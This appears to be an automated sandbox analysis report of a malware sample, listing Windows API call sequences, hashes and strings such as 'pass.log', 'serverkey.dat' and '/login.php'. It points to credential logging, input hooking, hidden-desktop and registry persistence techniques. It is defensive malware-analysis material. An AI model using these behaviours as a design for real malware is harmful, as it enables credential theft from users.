                                                                                                                                                                                                                • Part of subcall function 01309680: HeapFree.KERNEL32(00000000), ref: 01309723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732962355-0
                                                                                                                                                                                                              • Opcode ID: 6498fbba8fd166898b8fe1cd88aff8c251c20806a594dca95546932748461d50
                                                                                                                                                                                                              • Instruction ID: 206f99d29cd9e1a2ede0293870691eba07f3ffc4243a410c5409456aa9947903
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6498fbba8fd166898b8fe1cd88aff8c251c20806a594dca95546932748461d50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F511D3709023049FEB32DF69DA487AAFBFCEF45608F2005ADE989D3281E7709905C710
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,775B5180,?,012E1368,?,?), ref: 012FAA37
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,?,775B5180,?,012E1368,?,?,?,?,serverkey.dat), ref: 012FAA54
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,775B5180,?,012E1368,?,?,?,?,serverkey.dat), ref: 012FAA5B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013,?,?,775B5180,?,012E1368,?,?,?,?,serverkey.dat), ref: 012FAA6B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,775B5180,?,012E1368,?,?), ref: 012FAA88
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 913929354-0
                                                                                                                                                                                                              • Opcode ID: fb34c329e40567601306812c9a8843c0098fcdf8aac1d8b282304162b5a4f4e2
                                                                                                                                                                                                              • Instruction ID: 9d4990cfa847f9e445b66c6caf9c432a37e4a3339d4643a14e4d48a43e12d925
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb34c329e40567601306812c9a8843c0098fcdf8aac1d8b282304162b5a4f4e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E01717264222677E63159699C48FE77F6C9F46BB0F140328FB18AA1C4DA60D908C2F4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 012F80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 012F8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 012F8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 012F812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 012F8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: fe0bae27b1cc338d79c3a213a00afe572862c90b8d6bdd03d4db1d4ffeebe0bd
                                                                                                                                                                                                              • Instruction ID: 7086af14f087805c95744806f08adcb1a149a454cab0f496c9ef563aff7c64d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe0bae27b1cc338d79c3a213a00afe572862c90b8d6bdd03d4db1d4ffeebe0bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C11543152021ADBDB31DB68DC48BEAFBB8AF16700F1446ADDB51A72C0D7709A44CFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6C21
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 012E6C5C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3057210225-0
                                                                                                                                                                                                              • Opcode ID: a52bf5a309a8e330ceb2de042df5203a4cbe0b0359ffa2392273facb625bda25
                                                                                                                                                                                                              • Instruction ID: 0ed57e5a713a18692e1698d3942f148df46b449fa79b9c733f771f9aea760c71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a52bf5a309a8e330ceb2de042df5203a4cbe0b0359ffa2392273facb625bda25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75118270E5125917FB36AB348C0DBED7BA8EF28700F4045ACFB45E2180D7B08A948790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(?), ref: 012E6AB4
                                                                                                                                                                                                                • Part of subcall function 012E6980: memset.MSVCRT(?,00000000,000000FF), ref: 012E69A2
                                                                                                                                                                                                                • Part of subcall function 012E6980: memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF), ref: 012E69C0
                                                                                                                                                                                                                • Part of subcall function 012E6980: lstrcpynA.KERNEL32(?,?,00000104), ref: 012E69DD
                                                                                                                                                                                                                • Part of subcall function 012E6980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?,?,00000104), ref: 012E6A4D
                                                                                                                                                                                                                • Part of subcall function 012E6980: RegSetValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,00000104), ref: 012E6A6F
                                                                                                                                                                                                                • Part of subcall function 012E6980: RegCloseKey.ADVAPI32(?,?,00000104), ref: 012E6A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E6AE4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E6AE7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E6AF4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E6AF7
                                                                                                                                                                                                                • Part of subcall function 012E6690: memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012E66B0
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,0000000C,00000000,00000000,00000001,00000000,/login.php,012E6E36,00000000,00000000,00000000,00000000,00000000,?,00000000,774D0F10), ref: 012E670F
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,774D0F10), ref: 012E671F
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,00000004,?,?,?,?,774D0F10), ref: 012E6729
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,?,?,774D0F10), ref: 012E6734
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,0000000C,?,?,?,?,?,?,774D0F10), ref: 012E674F
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,?,?,?,?,774D0F10), ref: 012E675C
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,00000004,?,?,?,?,?,?,?,?,774D0F10), ref: 012E6766
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,774D0F10), ref: 012E6771
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,774D0F10), ref: 012E6794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$Heapexit$memset$Process$#680CloseFreeOpenValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1224010128-0
                                                                                                                                                                                                              • Opcode ID: 31279c948b90fe3b70620331f133fdd3c8ffa51dcf1cf4bae5c27e1781b396d5
                                                                                                                                                                                                              • Instruction ID: 6e1da3a6060d74a44581a7b68b175fe40103bf9c6de17a0cffec2e98176c5b6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31279c948b90fe3b70620331f133fdd3c8ffa51dcf1cf4bae5c27e1781b396d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01F044325512169ADA306EA6A80CBDA7A9CEBA1756F408015F705D6144CBB5D000C7F5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000), ref: 012ED242
                                                                                                                                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 012ED259
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012ED26F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012ED280
                                                                                                                                                                                                              • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 012ED297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1270303404-0
                                                                                                                                                                                                              • Opcode ID: 719252dad094a465d5e8251cc3988ad4095e2ddb836ffbe19b78bb92da2d6e42
                                                                                                                                                                                                              • Instruction ID: 7c06cab558a8be0d5ae85ca14786fa82b922c7202747fcbdbad56344ebf55151
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 719252dad094a465d5e8251cc3988ad4095e2ddb836ffbe19b78bb92da2d6e42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC018135951318BBEB30EB949C09FEE7B6CAB05B11F400288FB00A60C5D7F09B448BE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,?,00000000,774D3080,?,012E922C,?,00000006,00000000), ref: 012EE38C
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001,?,012E922C,?,00000006,00000000), ref: 012EE3A3
                                                                                                                                                                                                              • GetWindow.USER32(00000000,?,012E922C,?,00000006,00000000), ref: 012EE3A6
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000006,?,012E922C,?,012E922C,?,00000006,00000000), ref: 012EE3BD
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003,?,012E922C,?,00000006,00000000), ref: 012EE3C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3855296974-0
                                                                                                                                                                                                              • Opcode ID: 0bacbd29cfaed8da61f6ee13cd81d97b2462224559581f07686a0319e1b6452c
                                                                                                                                                                                                              • Instruction ID: 2ecdcd43365ca1c3a316f5eca9550981e64c47a1a927fe2850ac9a16c84bf260
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bacbd29cfaed8da61f6ee13cd81d97b2462224559581f07686a0319e1b6452c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F08276201218BFD731AF69EC88EABB3ACDB88760F014109FE0097344D6B0ED008BB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 012ED2BC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012ED2C4
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 012ED2D0
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000000D,?,?), ref: 012ED2E1
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 012ED2ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2643679612-0
                                                                                                                                                                                                              • Opcode ID: 7f21000cb41e07982d6969da7addd73feb77ef5f394670d5baa55aeb3412093d
                                                                                                                                                                                                              • Instruction ID: 9e0b2a6244ad9e50a7c1c5ffb5c59a6883e62e49385ef6a69307d4eefe134c65
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f21000cb41e07982d6969da7addd73feb77ef5f394670d5baa55aeb3412093d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF01C72301204BBD3306EA6AC8DFEBBB6CEB49762F10401AFA0597281C6B0990087B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000,?,?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE34A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE352
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE364
                                                                                                                                                                                                              • GetFocus.USER32(?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE366
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE373
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 968181190-0
                                                                                                                                                                                                              • Opcode ID: 8450f0bf5271931b3a62810d46dd75da395d5ad9bcc2917d3dcecc4991a4dc0d
                                                                                                                                                                                                              • Instruction ID: 972041e33cf09614fd2010d9e6cee6ca977452470e929ba89de39e0e2a59c60d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8450f0bf5271931b3a62810d46dd75da395d5ad9bcc2917d3dcecc4991a4dc0d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82E01271A01314BBD6306BA6AC4DFEBBB6CEB86766F500059FA09D3240D675AE0087B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,012E3E3A), ref: 012E7987
                                                                                                                                                                                                              • GetLastError.KERNEL32(?), ref: 012E7992
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E799A
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012E79A5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012E79AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$#680CreateDirectoryFolderMakePathSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1413619216-0
                                                                                                                                                                                                              • Opcode ID: b5e3f287e39bece9f41711e2f5d6d2986f306e39f83c1763b67cfc020201a1ac
                                                                                                                                                                                                              • Instruction ID: dbaa48d47529d387c246e563df53e1ef7bbaa2ed7a1d2a63663343318a7a0199
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5e3f287e39bece9f41711e2f5d6d2986f306e39f83c1763b67cfc020201a1ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4D0E2312121119BEB322F36A80C7AE3AACBF46B42F58001CFA01E1148DB24C20287A9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB437
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FB4A0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                              • String ID: 61c5c09f$pass.log
                                                                                                                                                                                                              • API String ID: 1760361154-24786173
                                                                                                                                                                                                              • Opcode ID: 9dafbd52574acd4cd384e56fcb9b8647feac15616bdb62bdf6f3d5909f127d3b
                                                                                                                                                                                                              • Instruction ID: 3feb65d569401465a29645275f11bef41b561da7c6befd24cb28dfd04c9cb5e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dafbd52574acd4cd384e56fcb9b8647feac15616bdb62bdf6f3d5909f127d3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41112B3050465A4BCB369E2CA5786E6BFE4EB86314F1481EDDAC987316D9708448C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 012EC464
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000EC,?), ref: 012EC486
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 012EC499
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$AttributesClassInfoLayeredLongName
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 195909263-4251816714
                                                                                                                                                                                                              • Opcode ID: 0f1a918c26ee5208f2c333cd61e039a4162b9da5fa9363c4f777bd0b2ac4aae9
                                                                                                                                                                                                              • Instruction ID: 8b60125ae0d8ab9c688aa9f048ddfc9763833e8e1148f0267b3f59f81c36ff79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f1a918c26ee5208f2c333cd61e039a4162b9da5fa9363c4f777bd0b2ac4aae9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62F0A4306641176AFB74AAA8D80EBBE7BACEF00750FA00128FB01E1194EB64D5648795
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Desk$\$o$p$t
                                                                                                                                                                                                              • API String ID: 0-1766595857
                                                                                                                                                                                                              • Opcode ID: 039ba6ad8b911574e6c5fa99f210a85cdf914ec6e900127014e58647964caa2c
                                                                                                                                                                                                              • Instruction ID: 4f3c1c4e20a48b5ab4294df6c4a04a1512b0e1004afaefdaafabc592cbf6ec2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 039ba6ad8b911574e6c5fa99f210a85cdf914ec6e900127014e58647964caa2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BA18C7191025A9FEB21CB28CD94FFF7768EF82300F5042D5EB49DB181D670AA46CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 3435927b5c40170d6a93397bb595ea62ac49ca410f73f76dac9a50fe402705bb
                                                                                                                                                                                                              • Instruction ID: d8e001aa21e247ef87dd7b1e292789af1e6aaa7d96464388976b8a6531204eea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3435927b5c40170d6a93397bb595ea62ac49ca410f73f76dac9a50fe402705bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D816E71A2021ADBDF25CF4CC448BAABBF9FF48314F980518EA06A7340D771E951CB91
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Desk$\$o$p$t
                                                                                                                                                                                                              • API String ID: 0-1766595857
                                                                                                                                                                                                              • Opcode ID: d86b431d1c05877a20477e7054f33b23480595be5d845d38dfa79bad9db3056e
                                                                                                                                                                                                              • Instruction ID: 0e0bc8431ab3e121b48597ac21b8a79485632d84189c08e193a1d7a93f738ee5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d86b431d1c05877a20477e7054f33b23480595be5d845d38dfa79bad9db3056e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C041CC7191029B4FFF228B28CD247FE77A9EF42301F5041E4DB8AD7082D634AA468B51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 013141EB
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 013141FD
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 0131420F
